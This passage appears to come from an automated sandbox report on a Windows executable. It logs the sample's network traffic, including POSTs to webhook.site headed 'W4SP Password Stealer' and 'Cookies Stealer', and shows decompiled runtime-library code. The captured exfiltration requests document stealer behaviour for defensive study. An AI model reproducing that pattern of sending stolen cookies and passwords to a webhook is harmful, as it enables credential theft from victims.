2023-04-04 07:04:15 UTC	2	IN	Data Raw: 62 39 0d 0a 63 61 6c 6c 62 61 63 6b 28 7b 22 63 6f 75 6e 74 72 79 5f 63 6f 64 65 22 3a 22 55 53 22 2c 22 63 6f 75 6e 74 72 79 5f 6e 61 6d 65 22 3a 22 55 6e 69 74 65 64 20 53 74 61 74 65 73 22 2c 22 63 69 74 79 22 3a 22 4c 6f 73 20 41 6e 67 65 6c 65 73 22 2c 22 70 6f 73 74 61 6c 22 3a 22 39 30 30 30 39 22 2c 22 6c 61 74 69 74 75 64 65 22 3a 33 34 2e 30 35 34 34 2c 22 6c 6f 6e 67 69 74 75 64 65 22 3a 2d 31 31 38 2e 32 34 34 2c 22 49 50 76 34 22 3a 22 31 30 32 2e 31 32 39 2e 31 34 33 2e 34 34 22 2c 22 73 74 61 74 65 22 3a 22 43 61 6c 69 66 6f 72 6e 69 61 22 7d 29 0d 0a 30 0d 0a 0d 0a Data Ascii: b9callback({"country_code":"US","country_name":"United States","city":"Los Angeles","postal":"90009","latitude":34.0544,"longitude":-118.244,"IPv4":"102.129.143.44","state":"California"})0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
5	192.168.2.6	49715	46.4.105.116	443	C:\Users\user\Desktop\4Vp6Xc8SFr.exe

Timestamp	kBytes transferred	Direction	Data
2023-04-04 07:04:15 UTC	2	OUT	POST /6ef9c344-b801-4707-b071-bfe96f5a7949 HTTP/1.1 Accept-Encoding: identity Content-Length: 554 Host: webhook.site Content-Type: application/json User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20100101 Firefox/102.0 Connection: close
2023-04-04 07:04:15 UTC	2	OUT	Data Raw: 7b 22 63 6f 6e 74 65 6e 74 22 3a 20 22 3a 66 6c 61 67 5f 75 73 3a 20 20 2d 20 60 45 4e 47 49 4e 45 45 52 20 7c 20 31 30 32 2e 31 32 39 2e 31 34 33 2e 34 34 20 28 55 6e 69 74 65 64 20 53 74 61 74 65 73 29 60 22 2c 20 22 65 6d 62 65 64 73 22 3a 20 5b 7b 22 74 69 74 6c 65 22 3a 20 22 57 34 53 50 20 7c 20 50 61 73 73 77 6f 72 64 20 53 74 65 61 6c 65 72 22 2c 20 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 20 22 2a 2a 46 6f 75 6e 64 2a 2a 3a 5c 6e 5c 6e 5c 6e 2a 2a 44 61 74 61 3a 2a 2a 5c 6e 5c 75 64 38 33 64 5c 75 64 64 31 31 20 5c 75 32 30 32 32 20 2a 2a 30 2a 2a 20 50 61 73 73 77 6f 72 64 73 20 46 6f 75 6e 64 5c 6e 3a 6c 69 6e 6b 3a 20 5c 75 32 30 32 32 20 5b 77 34 73 70 50 61 73 73 77 6f 72 64 2e 74 78 74 5d 28 46 61 6c 73 65 29 22 2c 20 22 63 6f 6c 6f 72 22 Data Ascii: {"content": ":flag_us: - `user \| 102.129.143.44 (United States)`", "embeds": [{"title": "W4SP \| Password Stealer", "description": "Found:\n\n\nData:\n\ud83d\udd11 \u2022 0 Passwords Found\n:link: \u2022 [w4spPassword.txt](False)", "color"
2023-04-04 07:04:15 UTC	3	IN	HTTP/1.1 200 OK Server: nginx Content-Type: text/plain; charset=UTF-8 Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding X-Request-Id: 62f431e9-b9f8-473c-8d56-2252b39de3b3 X-Token-Id: 6ef9c344-b801-4707-b071-bfe96f5a7949 Cache-Control: no-cache, private Date: Tue, 04 Apr 2023 07:04:15 GMT
2023-04-04 07:04:15 UTC	3	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
6	192.168.2.6	49717	64.185.227.155	443	C:\Users\user\Desktop\4Vp6Xc8SFr.exe

Timestamp	kBytes transferred	Direction	Data
2023-04-04 07:04:17 UTC	3	OUT	GET / HTTP/1.1 Accept-Encoding: identity Host: api.ipify.org User-Agent: Python-urllib/3.10 Connection: close
2023-04-04 07:04:17 UTC	3	IN	HTTP/1.1 200 OK Content-Length: 14 Content-Type: text/plain Date: Tue, 04 Apr 2023 07:04:17 GMT Vary: Origin Connection: close
2023-04-04 07:04:17 UTC	3	IN	Data Raw: 31 30 32 2e 31 32 39 2e 31 34 33 2e 34 34 Data Ascii: 102.129.143.44

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
7	192.168.2.6	49718	159.89.102.253	443	C:\Users\user\Desktop\4Vp6Xc8SFr.exe

Timestamp	kBytes transferred	Direction	Data
2023-04-04 07:04:17 UTC	3	OUT	GET /jsonp/102.129.143.44 HTTP/1.1 Accept-Encoding: identity Host: geolocation-db.com User-Agent: Python-urllib/3.10 Connection: close
2023-04-04 07:04:17 UTC	4	IN	HTTP/1.1 200 OK Server: nginx/1.14.0 (Ubuntu) Date: Tue, 04 Apr 2023 07:04:17 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Access-Control-Allow-Origin: *
2023-04-04 07:04:17 UTC	4	IN	Data Raw: 62 39 0d 0a 63 61 6c 6c 62 61 63 6b 28 7b 22 63 6f 75 6e 74 72 79 5f 63 6f 64 65 22 3a 22 55 53 22 2c 22 63 6f 75 6e 74 72 79 5f 6e 61 6d 65 22 3a 22 55 6e 69 74 65 64 20 53 74 61 74 65 73 22 2c 22 63 69 74 79 22 3a 22 4c 6f 73 20 41 6e 67 65 6c 65 73 22 2c 22 70 6f 73 74 61 6c 22 3a 22 39 30 30 30 39 22 2c 22 6c 61 74 69 74 75 64 65 22 3a 33 34 2e 30 35 34 34 2c 22 6c 6f 6e 67 69 74 75 64 65 22 3a 2d 31 31 38 2e 32 34 34 2c 22 49 50 76 34 22 3a 22 31 30 32 2e 31 32 39 2e 31 34 33 2e 34 34 22 2c 22 73 74 61 74 65 22 3a 22 43 61 6c 69 66 6f 72 6e 69 61 22 7d 29 0d 0a 30 0d 0a 0d 0a Data Ascii: b9callback({"country_code":"US","country_name":"United States","city":"Los Angeles","postal":"90009","latitude":34.0544,"longitude":-118.244,"IPv4":"102.129.143.44","state":"California"})0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
8	192.168.2.6	49719	46.4.105.116	443	C:\Users\user\Desktop\4Vp6Xc8SFr.exe

Timestamp	kBytes transferred	Direction	Data
2023-04-04 07:04:19 UTC	4	OUT	POST /6ef9c344-b801-4707-b071-bfe96f5a7949 HTTP/1.1 Accept-Encoding: identity Content-Length: 546 Host: webhook.site Content-Type: application/json User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20100101 Firefox/102.0 Connection: close
2023-04-04 07:04:19 UTC	4	OUT	Data Raw: 7b 22 63 6f 6e 74 65 6e 74 22 3a 20 22 3a 66 6c 61 67 5f 75 73 3a 20 20 2d 20 60 45 4e 47 49 4e 45 45 52 20 7c 20 31 30 32 2e 31 32 39 2e 31 34 33 2e 34 34 20 28 55 6e 69 74 65 64 20 53 74 61 74 65 73 29 60 22 2c 20 22 65 6d 62 65 64 73 22 3a 20 5b 7b 22 74 69 74 6c 65 22 3a 20 22 57 34 53 50 20 7c 20 43 6f 6f 6b 69 65 73 20 53 74 65 61 6c 65 72 22 2c 20 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 20 22 2a 2a 46 6f 75 6e 64 2a 2a 3a 5c 6e 5c 6e 5c 6e 2a 2a 44 61 74 61 3a 2a 2a 5c 6e 3a 63 6f 6f 6b 69 65 3a 20 5c 75 32 30 32 32 20 2a 2a 33 2a 2a 20 43 6f 6f 6b 69 65 73 20 46 6f 75 6e 64 5c 6e 3a 6c 69 6e 6b 3a 20 5c 75 32 30 32 32 20 5b 77 34 73 70 43 6f 6f 6b 69 65 73 2e 74 78 74 5d 28 46 61 6c 73 65 29 22 2c 20 22 63 6f 6c 6f 72 22 3a 20 31 34 34 30 36 34 Data Ascii: {"content": ":flag_us: - `user \| 102.129.143.44 (United States)`", "embeds": [{"title": "W4SP \| Cookies Stealer", "description": "Found:\n\n\nData:\n:cookie: \u2022 3 Cookies Found\n:link: \u2022 [w4spCookies.txt](False)", "color": 144064
2023-04-04 07:04:19 UTC	5	IN	HTTP/1.1 200 OK Server: nginx Content-Type: text/plain; charset=UTF-8 Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding X-Request-Id: 14264325-b7b4-442f-b0b3-101f4754f3bb X-Token-Id: 6ef9c344-b801-4707-b071-bfe96f5a7949 Cache-Control: no-cache, private Date: Tue, 04 Apr 2023 07:04:19 GMT
2023-04-04 07:04:19 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
9	192.168.2.6	49720	173.231.16.75	443	C:\Users\user\Desktop\4Vp6Xc8SFr.exe

Timestamp	kBytes transferred	Direction	Data
2023-04-04 07:04:29 UTC	5	OUT	GET / HTTP/1.1 Accept-Encoding: identity Host: api.ipify.org User-Agent: Python-urllib/3.10 Connection: close
2023-04-04 07:04:29 UTC	5	IN	HTTP/1.1 200 OK Content-Length: 14 Content-Type: text/plain Date: Tue, 04 Apr 2023 07:04:29 GMT Vary: Origin Connection: close
2023-04-04 07:04:29 UTC	5	IN	Data Raw: 31 30 32 2e 31 32 39 2e 31 34 33 2e 34 34 Data Ascii: 102.129.143.44

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

High Level Behavior Distribution

Click to dive into process behavior distribution

Behavior

Click to jump to process

System Behavior

Analysis Process: 4Vp6Xc8SFr.exePID: 5220, Parent PID: 3452

General

Target ID:	0
Start time:	09:04:03
Start date:	04/04/2023
Path:	C:\Users\user\Desktop\4Vp6Xc8SFr.exe
Wow64 process (32bit):	false
Commandline:	C:\Users\user\Desktop\4Vp6Xc8SFr.exe
Imagebase:	0x7ff7da8d0000
File size:	9489558 bytes
MD5 hash:	B91A84A6995CB793EF6417222281295B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low

Show Windows behavior

Chronological Activities

Analysis Process: 4Vp6Xc8SFr.exePID: 6932, Parent PID: 5220

General

Target ID:	1
Start time:	09:04:09
Start date:	04/04/2023
Path:	C:\Users\user\Desktop\4Vp6Xc8SFr.exe
Wow64 process (32bit):	false
Commandline:	C:\Users\user\Desktop\4Vp6Xc8SFr.exe
Imagebase:	0x7ff7da8d0000
File size:	9489558 bytes
MD5 hash:	B91A84A6995CB793EF6417222281295B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low

Show Windows behavior

Chronological Activities

Disassembly

Reset < >

Analysis Process: 4Vp6Xc8SFr.exePID: 5220, Parent PID: 3452COMMON

Execution Graph

Execution Coverage:	12.3%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	17%
Total number of Nodes:	2000
Total number of Limit Nodes:	67

Executed Functions

Function 00007FF7DA8F4D70 Relevance: 14.3, APIs: 6, Strings: 2, Instructions: 334
timeCOMMONCrypto

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E00007FF77FF7DA8F4D70(void* __eflags, void* __rax, signed short* __rcx, char _a16, char _a24) {
				void* _t10;
				intOrPtr _t23;
				void* _t29;
				signed short* _t31;
				intOrPtr _t36;
				signed long long _t42;

				_t29 = __rax;
				E00007FF77FF7DA8F4700(E00007FF77FF7DA8F46F8(_t10));
				r12d = 0;
				_a16 = r12d;
				_a24 = r12d;
				if (E00007FF77FF7DA8F4768(_t29,  &_a16) != 0) goto 0xda8f4fd5;
				if (E00007FF77FF7DA8F4708(_t29,  &_a24) != 0) goto 0xda8f4fd5;
				_t36 =  *0xda91d2b0; // 0x0
				_t23 = _t36;
				if (_t23 == 0) goto 0xda8f4dee;
				r8d =  *(__rcx + _t36 - __rcx) & 0x0000ffff;
				if (_t23 != 0) goto 0xda8f4dea;
				_t31 =  &(__rcx[1]);
				if (r8d != 0) goto 0xda8f4dd4;
				if (( *__rcx & 0x0000ffff) - r8d == 0) goto 0xda8f4e1b;
				_t39 = (_t42 | 0xffffffff) + 1;
				if (__rcx[(_t42 | 0xffffffff) + 1] != r12w) goto 0xda8f4df5;
				E00007FF77FF7DA8ECA1C(_t31, 2 + _t39 * 2);
				if (_t31 != 0) goto 0xda8f4e2a;
				return E00007FF77FF7DA8E9D68(_t31, 2 + _t39 * 2);
			}

0x7ff7da8f4d70
0x7ff7da8f4d8d
0x7ff7da8f4d92
0x7ff7da8f4d99
0x7ff7da8f4da0
0x7ff7da8f4dab
0x7ff7da8f4dbc
0x7ff7da8f4dc2
0x7ff7da8f4dc9
0x7ff7da8f4dcc
0x7ff7da8f4dd7
0x7ff7da8f4ddf
0x7ff7da8f4de1
0x7ff7da8f4de8
0x7ff7da8f4dec
0x7ff7da8f4df5
0x7ff7da8f4dfd
0x7ff7da8f4e07
0x7ff7da8f4e12
0x7ff7da8f4e29

APIs

_get_daylight.LIBCMT ref: 00007FF7DA8F4DB5

Part of subcall function 00007FF7DA8F4708: _invalid_parameter_noinfo.LIBCMT ref: 00007FF7DA8F471C

Part of subcall function 00007FF7DA8E9D68: RtlReleasePrivilege.NTDLL(?,?,?,00007FF7DA8F1D92,?,?,?,00007FF7DA8F1DCF,?,?,00000000,00007FF7DA8F2295,?,?,?,00007FF7DA8F21C7), ref: 00007FF7DA8E9D7E
Part of subcall function 00007FF7DA8E9D68: GetLastError.KERNEL32(?,?,?,00007FF7DA8F1D92,?,?,?,00007FF7DA8F1DCF,?,?,00000000,00007FF7DA8F2295,?,?,?,00007FF7DA8F21C7), ref: 00007FF7DA8E9D88

Part of subcall function 00007FF7DA8E9D20: IsProcessorFeaturePresent.KERNEL32(?,?,?,?,00007FF7DA8E9CFF,?,?,?,?,?,00007FF7DA8E213C), ref: 00007FF7DA8E9D29
Part of subcall function 00007FF7DA8E9D20: GetCurrentProcess.KERNEL32(?,?,?,?,00007FF7DA8E9CFF,?,?,?,?,?,00007FF7DA8E213C), ref: 00007FF7DA8E9D4E

_get_daylight.LIBCMT ref: 00007FF7DA8F4DA4

Part of subcall function 00007FF7DA8F4768: _invalid_parameter_noinfo.LIBCMT ref: 00007FF7DA8F477C

_get_daylight.LIBCMT ref: 00007FF7DA8F501A
_get_daylight.LIBCMT ref: 00007FF7DA8F502B
_get_daylight.LIBCMT ref: 00007FF7DA8F503C
GetTimeZoneInformation.KERNELBASE(?,?,?,?,?,?,?,?,?,00000000,?,00007FF7DA8F527C), ref: 00007FF7DA8F5063

Strings

Pacific Daylight Time, xrefs: 00007FF7DA8F5121
Pacific Standard Time, xrefs: 00007FF7DA8F5109

Memory Dump Source

Source File: 00000000.00000002.339090214.00007FF7DA8D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7DA8D0000, based on PE: true

Associated: 00000000.00000002.339080100.00007FF7DA8D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.339117101.00007FF7DA8FA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.339131229.00007FF7DA90D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.339131229.00007FF7DA91C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.339173734.00007FF7DA91E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7da8d0000_4Vp6Xc8SFr.jbxd

Similarity

API ID: _get_daylight$_invalid_parameter_noinfo$CurrentErrorFeatureInformationLastPresentPrivilegeProcessProcessorReleaseTimeZone
String ID: Pacific Daylight Time$Pacific Standard Time
API String ID: 415722205-1154798116
Opcode ID: 816439d3bd575303d6dac3b755dec2291bd9c4597d9bb63b95ebff5b14bd9145
Instruction ID: 54c32586a4094a7df6b475d4a8757fa1cef680a9392766637f084a1150e3875b
Opcode Fuzzy Hash: 816439d3bd575303d6dac3b755dec2291bd9c4597d9bb63b95ebff5b14bd9145
Instruction Fuzzy Hash: C5D19E26E0825386FB26BF2598401BDA6A1FBA4794FC44177EE4D87687DF3CE461C360

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7DA8F5CBC Relevance: 13.8, APIs: 9, Instructions: 276
fileCOMMONCrypto

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 40%

			E00007FF77FF7DA8F5CBC(void* __ecx, void* __eflags, long long __rbx, long long __rcx, signed int* __rdx, long long __rdi, long long __rsi, long long __r8) {
				void* __rbp;
				signed int _t148;
				long _t161;
				void* _t165;
				signed int _t167;
				void* _t182;
				signed int _t185;
				signed int _t186;
				intOrPtr* _t234;
				intOrPtr* _t237;
				long long _t249;
				long long _t257;
				signed long long _t263;
				signed long long _t279;
				signed int* _t303;
				long long _t306;
				void* _t308;
				void* _t309;
				intOrPtr* _t311;
				void* _t312;
				void* _t320;
				void* _t322;
				void* _t326;
				void* _t330;

				_t234 = _t311;
				 *((long long*)(_t234 + 8)) = __rbx;
				 *((long long*)(_t234 + 0x10)) = __rsi;
				 *((long long*)(_t234 + 0x20)) = __rdi;
				 *((long long*)(_t234 + 0x18)) = __r8;
				_t309 = _t234 - 0x47;
				_t312 = _t311 - 0xc0;
				r12d = r9d;
				_t257 = __r8;
				r9d =  *(_t309 + 0x77);
				_t303 = __rdx;
				r8d =  *(_t309 + 0x6f);
				_t306 = __rcx;
				E00007FF77FF7DA8F59F0(r12d, __eflags, _t234, __r8, _t309 - 1, _t309);
				asm("movups xmm0, [eax]");
				asm("movsd xmm1, [eax+0x10]");
				asm("movups [ebp-0x59], xmm0");
				asm("psrldq xmm0, 0x8");
				asm("dec cx");
				asm("movsd [ebp-0x39], xmm1");
				asm("movsd [ebp-0x49], xmm1");
				 *(_t309 - 0x29) = _t330 >> 0x20;
				if (r15d != 0xffffffff) goto 0xda8f5d49;
				E00007FF77FF7DA8E4374(_t234);
				 *_t234 = 0;
				 *__rdx =  *__rdx | 0xffffffff;
				E00007FF77FF7DA8E4394(_t234);
				goto 0xda8f608a;
				_t148 = E00007FF77FF7DA8E6C4C(r12d, _t234, __r8, __rdx, __rdx, _t306);
				 *__rdx = _t148;
				if (_t148 != 0xffffffff) goto 0xda8f5d6e;
				E00007FF77FF7DA8E4374(_t234);
				 *_t234 = 0;
				 *__rdx =  *__rdx | 0xffffffff;
				E00007FF77FF7DA8E4394(_t234);
				 *_t234 = 0x18;
				goto 0xda8f5d3d;
				r8d = r15d;
				r14d = r14d |  *(_t309 - 0x49);
				 *_t306 = 1;
				 *((long long*)(_t312 + 0x30)) = _t306;
				 *(_t312 + 0x28) = r14d;
				 *((intOrPtr*)(_t312 + 0x20)) =  *((intOrPtr*)(_t309 - 0x51));
				 *((intOrPtr*)(_t309 - 0x21)) = 0x18;
				 *((long long*)(_t309 - 0x19)) = _t306;
				 *(_t309 - 0x11) =  !(r12d >> 7) & 0x00000001;
				 *(_t309 - 0x31) =  *(_t309 - 0x49) >> 0x20;
				CreateFileW(??, ??, ??, ??, ??, ??, ??); // executed
				_t185 =  *(_t309 - 0x55);
				if (_t234 != 0xffffffff) goto 0xda8f5e54;
				if ((_t185 & 0xc0000000) != 0xc0000000) goto 0xda8f5e21;
				if ((r12b & 0x00000001) == 0) goto 0xda8f5e21;
				 *((long long*)(_t312 + 0x30)) = _t306;
				asm("btr ebx, 0x1f");
				 *(_t309 - 0x55) = _t185;
				r8d = r15d;
				 *(_t312 + 0x28) = r14d;
				 *((intOrPtr*)(_t312 + 0x20)) =  *((intOrPtr*)(_t309 - 0x51));
				CreateFileW(??, ??, ??, ??, ??, ??, ??);
				if (_t234 != 0xffffffff) goto 0xda8f5e54;
				_t263 =  *__rdx;
				_t237 =  *((intOrPtr*)(0xda91ca20 + (_t263 >> 6) * 8));
				 *(_t237 + 0x38 + (_t263 + _t263 * 8) * 8) =  *(_t237 + 0x38 + (_t263 + _t263 * 8) * 8) & 0x000000fe;
				E00007FF77FF7DA8E4308(GetLastError(), _t237, _t263 + _t263 * 8);
				goto 0xda8f5d3d;
				_t161 = GetFileType(_t330); // executed
				if (_t161 != 0) goto 0xda8f5eb2;
				_t186 = GetLastError();
				E00007FF77FF7DA8E4308(_t162, _t237, _t234);
				 *( *((intOrPtr*)(0xda91ca20 + ( *__rdx >> 6) * 8)) + 0x38 + ( *__rdx +  *__rdx * 8) * 8) =  *( *((intOrPtr*)(0xda91ca20 + ( *__rdx >> 6) * 8)) + 0x38 + ( *__rdx +  *__rdx * 8) * 8) & 0x000000fe;
				CloseHandle(_t326);
				if (_t186 != 0) goto 0xda8f5d3d;
				_t165 = E00007FF77FF7DA8E4394(_t237);
				 *_t237 = 0xd;
				goto 0xda8f5d3d;
				r14b =  *(_t309 - 0x59);
				if (_t165 != 2) goto 0xda8f5ec1;
				r14b = r14b | 0x00000040;
				goto 0xda8f5eca;
				if (_t165 != 3) goto 0xda8f5eca;
				r14b = r14b | 0x00000008;
				E00007FF77FF7DA8E6B64(_t165, _t186,  *__rdx, _t257, _t234, __rdx, _t306, _t309, _t322, _t320);
				r14b = r14b | 0x00000001;
				 *(_t309 - 0x41) = r14b;
				 *(_t309 - 0x59) = r14b;
				 *( *((intOrPtr*)(0xda91ca20 + ( *__rdx >> 6) * 8)) + 0x38 + ( *__rdx +  *__rdx * 8) * 8) = r14b;
				 *((intOrPtr*)( *((intOrPtr*)(0xda91ca20 + ( *__rdx >> 6) * 8)) + 0x39 + ( *__rdx +  *__rdx * 8) * 8)) = sil;
				if ((r12b & 0x00000002) == 0) goto 0xda8f5f3e;
				_t167 = E00007FF77FF7DA8F5BF8(_t186,  *__rdx, r12d & 0x0000003f, _t257, _t309 - 0x21);
				r14d = _t167;
				if (_t167 == 0) goto 0xda8f5f3e;
				E00007FF77FF7DA8E9EE0( *((intOrPtr*)(0xda91ca20 + ( *__rdx >> 6) * 8)), _t257, _t303);
				goto 0xda8f608a;
				asm("movups xmm0, [ebp-0x59]");
				asm("movsd xmm1, [ebp-0x39]");
				r8d = r12d;
				asm("movaps [ebp-0x1], xmm0");
				 *((intOrPtr*)(_t309 - 0x61)) = sil;
				asm("movsd [ebp+0xf], xmm1");
				r14d = E00007FF77FF7DA8F5770( *_t303, _t257, _t309 - 1, _t306, _t309 - 0x61);
				if (r14d == 0) goto 0xda8f5f75;
				goto 0xda8f5f31;
				 *((char*)( *((intOrPtr*)(0xda91ca20 + ( *_t303 >> 6) * 8)) + 0x39 + ( *_t303 +  *_t303 * 8) * 8)) =  *((intOrPtr*)(_t309 - 0x61));
				 *( *((intOrPtr*)(0xda91ca20 + ( *_t303 >> 6) * 8)) + 0x3d + ( *_t303 +  *_t303 * 8) * 8) =  *( *((intOrPtr*)(0xda91ca20 + ( *_t303 >> 6) * 8)) + 0x3d + ( *_t303 +  *_t303 * 8) * 8) ^ (r12d >> 0x00000010 ^  *( *((intOrPtr*)(0xda91ca20 + ( *_t303 >> 6) * 8)) + 0x3d + ( *_t303 +  *_t303 * 8) * 8)) & 0x00000001;
				if (( *(_t309 - 0x41) & 0x00000048) != 0) goto 0xda8f5fd9;
				if ((r12b & 0x00000008) == 0) goto 0xda8f5fd9;
				_t279 =  *_t303;
				_t249 =  *((intOrPtr*)(0xda91ca20 + (_t279 >> 6) * 8));
				 *(_t249 + 0x38 + (_t279 + _t279 * 8) * 8) =  *(_t249 + 0x38 + (_t279 + _t279 * 8) * 8) | 0x00000020;
				if ((_t186 & 0xc0000000) != 0xc0000000) goto 0xda8f6088;
				if ((r12b & 0x00000001) == 0) goto 0xda8f6088;
				CloseHandle(_t308);
				r8d =  *(_t309 - 0x29);
				asm("btr ebx, 0x1f");
				 *((long long*)(_t312 + 0x30)) = _t306;
				 *(_t312 + 0x28) = 0xc0000000;
				 *((intOrPtr*)(_t312 + 0x20)) =  *((intOrPtr*)(_t309 - 0x51));
				 *(_t309 - 0x55) = _t186;
				CreateFileW(??, ??, ??, ??, ??, ??, ??);
				if (_t249 != 0xffffffff) goto 0xda8f606e;
				_t182 = E00007FF77FF7DA8E4308(GetLastError(), _t249,  *((intOrPtr*)(_t309 + 0x5f)));
				 *( *((intOrPtr*)(0xda91ca20 + ( *_t303 >> 6) * 8)) + 0x38 + ( *_t303 +  *_t303 * 8) * 8) =  *( *((intOrPtr*)(0xda91ca20 + ( *_t303 >> 6) * 8)) + 0x38 + ( *_t303 +  *_t303 * 8) * 8) & 0x000000fe;
				E00007FF77FF7DA8E6D8C(_t182, _t186,  *_t303, _t257, _t303, _t306);
				goto 0xda8f5d3d;
				 *((long long*)( *((intOrPtr*)(0xda91ca20 + ( *_t303 >> 6) * 8)) + 0x28 + ( *_t303 +  *_t303 * 8) * 8)) = _t249;
				return 0;
			}

0x7ff7da8f5cbc
0x7ff7da8f5cbf
0x7ff7da8f5cc3
0x7ff7da8f5cc7
0x7ff7da8f5ccb
0x7ff7da8f5cd8
0x7ff7da8f5cdc
0x7ff7da8f5ce3
0x7ff7da8f5ce6
0x7ff7da8f5ce9
0x7ff7da8f5ced
0x7ff7da8f5cf0
0x7ff7da8f5cf4
0x7ff7da8f5cfe
0x7ff7da8f5d03
0x7ff7da8f5d06
0x7ff7da8f5d0b
0x7ff7da8f5d0f
0x7ff7da8f5d14
0x7ff7da8f5d19
0x7ff7da8f5d22
0x7ff7da8f5d27
0x7ff7da8f5d2f
0x7ff7da8f5d31
0x7ff7da8f5d38
0x7ff7da8f5d3a
0x7ff7da8f5d3d
0x7ff7da8f5d44
0x7ff7da8f5d49
0x7ff7da8f5d4e
0x7ff7da8f5d53
0x7ff7da8f5d55
0x7ff7da8f5d5c
0x7ff7da8f5d5e
0x7ff7da8f5d61
0x7ff7da8f5d66
0x7ff7da8f5d6c
0x7ff7da8f5d80
0x7ff7da8f5d8c
0x7ff7da8f5d93
0x7ff7da8f5d9b
0x7ff7da8f5da0
0x7ff7da8f5da5
0x7ff7da8f5db0
0x7ff7da8f5db7
0x7ff7da8f5dbb
0x7ff7da8f5dbe
0x7ff7da8f5dc2
0x7ff7da8f5dc8
0x7ff7da8f5dd7
0x7ff7da8f5ddf
0x7ff7da8f5de5
0x7ff7da8f5dee
0x7ff7da8f5df3
0x7ff7da8f5df7
0x7ff7da8f5dfa
0x7ff7da8f5e01
0x7ff7da8f5e06
0x7ff7da8f5e12
0x7ff7da8f5e1f
0x7ff7da8f5e21
0x7ff7da8f5e39
0x7ff7da8f5e3d
0x7ff7da8f5e4a
0x7ff7da8f5e4f
0x7ff7da8f5e57
0x7ff7da8f5e5f
0x7ff7da8f5e69
0x7ff7da8f5e6b
0x7ff7da8f5e8c
0x7ff7da8f5e94
0x7ff7da8f5e9c
0x7ff7da8f5ea2
0x7ff7da8f5ea7
0x7ff7da8f5ead
0x7ff7da8f5eb2
0x7ff7da8f5eb9
0x7ff7da8f5ebb
0x7ff7da8f5ebf
0x7ff7da8f5ec4
0x7ff7da8f5ec6
0x7ff7da8f5ecf
0x7ff7da8f5ee1
0x7ff7da8f5eec
0x7ff7da8f5ef0
0x7ff7da8f5efc
0x7ff7da8f5f16
0x7ff7da8f5f1f
0x7ff7da8f5f23
0x7ff7da8f5f28
0x7ff7da8f5f2d
0x7ff7da8f5f31
0x7ff7da8f5f39
0x7ff7da8f5f3e
0x7ff7da8f5f48
0x7ff7da8f5f51
0x7ff7da8f5f54
0x7ff7da8f5f58
0x7ff7da8f5f5c
0x7ff7da8f5f66
0x7ff7da8f5f6f
0x7ff7da8f5f73
0x7ff7da8f5f8a
0x7ff7da8f5faf
0x7ff7da8f5fb7
0x7ff7da8f5fbd
0x7ff7da8f5fbf
0x7ff7da8f5fd0
0x7ff7da8f5fd4
0x7ff7da8f5fe4
0x7ff7da8f5fee
0x7ff7da8f5ff7
0x7ff7da8f6005
0x7ff7da8f6009
0x7ff7da8f600d
0x7ff7da8f6012
0x7ff7da8f6019
0x7ff7da8f6021
0x7ff7da8f602c
0x7ff7da8f6039
0x7ff7da8f6043
0x7ff7da8f605d
0x7ff7da8f6064
0x7ff7da8f6069
0x7ff7da8f6083
0x7ff7da8f60aa

APIs

Part of subcall function 00007FF7DA8F59F0: _invalid_parameter_noinfo.LIBCMT ref: 00007FF7DA8F5A31
Part of subcall function 00007FF7DA8F59F0: _invalid_parameter_noinfo.LIBCMT ref: 00007FF7DA8F5AAF
Part of subcall function 00007FF7DA8F59F0: _invalid_parameter_noinfo.LIBCMT ref: 00007FF7DA8F5B00

CreateFileW.KERNELBASE ref: 00007FF7DA8F5DC2
CreateFileW.KERNEL32 ref: 00007FF7DA8F5E12
GetLastError.KERNEL32 ref: 00007FF7DA8F5E42
GetFileType.KERNELBASE ref: 00007FF7DA8F5E57
GetLastError.KERNEL32 ref: 00007FF7DA8F5E61
CloseHandle.KERNEL32 ref: 00007FF7DA8F5E94
CloseHandle.KERNEL32 ref: 00007FF7DA8F5FF7
CreateFileW.KERNEL32 ref: 00007FF7DA8F602C
GetLastError.KERNEL32 ref: 00007FF7DA8F603B

Memory Dump Source

Source File: 00000000.00000002.339090214.00007FF7DA8D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7DA8D0000, based on PE: true

Associated: 00000000.00000002.339080100.00007FF7DA8D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.339117101.00007FF7DA8FA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.339131229.00007FF7DA90D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.339131229.00007FF7DA91C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.339173734.00007FF7DA91E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

